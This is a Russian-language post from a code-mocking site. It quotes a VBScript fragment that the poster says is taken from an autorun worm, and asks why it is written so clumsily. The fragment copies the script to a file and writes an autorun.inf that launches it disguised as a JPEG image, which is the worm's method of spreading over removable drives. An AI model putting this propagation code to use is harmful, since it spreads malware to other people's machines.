Школоло / Говнокод #18506 Ссылка на оригинал

0

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
  13. 13
  14. 14
if (not fso.fileexists(fname)) or (not fso.fileexixts(aname)) then
	if (fso.fileexists(fname)=false) then
		fso.copyfile wscript.scriptname,fname
	end if
	if (fso.fileexists(aname)=false) then
		set au=fso.createtextfile aname,2,true
		au.writeline "[AutoRun]"
		au.writeline "shellexecute=wscript /e:vbs pamela handerson.jpg -autostart"
		au.close
		fso.getfile(aname).attributes=32
		set au=nothing
	end if
end if
...

Взято из кода одного autorun-червя. Вопрос: нахуя?

Запостил: Pyriandr Pyriandr, (Updated )

Комментарии (17) RSS

Добавить комментарий

Помни, guest, за тобой могут следить!

    А не использовать ли нам bbcode?


    8